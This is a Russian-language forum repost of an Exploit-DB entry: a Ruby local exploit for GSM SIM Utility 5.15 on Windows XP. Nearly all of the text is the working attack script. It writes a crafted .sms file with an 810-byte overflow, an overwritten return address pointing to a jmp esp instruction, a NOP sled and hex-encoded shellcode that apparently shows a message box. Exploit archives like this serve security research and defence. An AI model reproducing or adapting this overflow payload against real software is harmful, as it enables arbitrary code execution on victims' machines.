Exploit GSM SIM Utility 5.15 - Direct RET Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14258
Проверка EDB
  1. Пройдено
Автор
CHAP0
Тип уязвимости
LOCAL
Платформа
WINDOWS
CVE
null
Дата публикации
2010-07-07
Код:
# Exploit Title : GSM SIM Utility Local Exploit Direct Ret ver.
# Date          : July 07, 2010
# Author        : chap0 [www.seek-truth.net]
# Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-18508_4-10396246.html?tag=mncol
# Version       : 5.15
# OS            : Windows XP SP3
# Greetz to     : Corelan Security Team
# Advisory      : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054
# The Crew      : http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.
# Code :
#!/usr/bin/ruby
puts '|------------------------------------------------------------------|'
puts '|                         __               __                      |'
puts '|   _________  ________  / /___ _____     / /____  ____ _____ ___  |'
puts '|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |'
puts '| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |'
puts '| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |'
puts '|                                                                  |'
puts '|                                       http://www.corelan.be:8800 |'
puts '|                                                                  |'
puts '|-------------------------------------------------[ EIP Hunters ]--|'
puts '[*] GSM SIM Utility Local Exploit Direct Ret ver. by chap0.'
puts '[*] Visit seek-truth.net'

crash = "A" * 810
eip = "01524000" #jmp esp
nop = "90" * 10
#message box
code ="d9eb9bd97424f431d2b27a31c964"+
"8b71308b760c8b761c8b46088b7e"+
"208b36384f1875f35901d1ffe160"+
"8b6c24248b453c8b54057801ea8b"+
"4a188b5a2001ebe337498b348b01"+
"ee31ff31c0fcac84c0740ac1cf0d"+
"01c7e9f1ffffff3b7c242875de8b"+
"5a2401eb668b0c4b8b5a1c01eb8b"+
"048b01e88944241c61c3b20829d4"+
"89e589c2688e4e0eec52e89cffff"+
"ff894504bb7ed8e273871c2452e8"+
"8bffffff894508686c6c20ff6833"+
"322e646875736572885c240a89e6"+
"56ff550489c250bba8a24dbc871c"+
"2452e85effffff68703058206820"+
"6368616864206279686f69746568"+
"4578706c31db885c241289e36868"+
"5820206844656174682069732068"+
"2053696e6873206f666857616765"+
"685468652031c9884c241989e131"+
"d252535152ffd031c050ff5508"

payload = crash + eip + nop + code

sms = File.new( "directret.sms", "w" )
	if sms
	sms.syswrite(payload)
	else
	puts "Unable to create file."
end
 
Источник
www.exploit-db.com

Похожие темы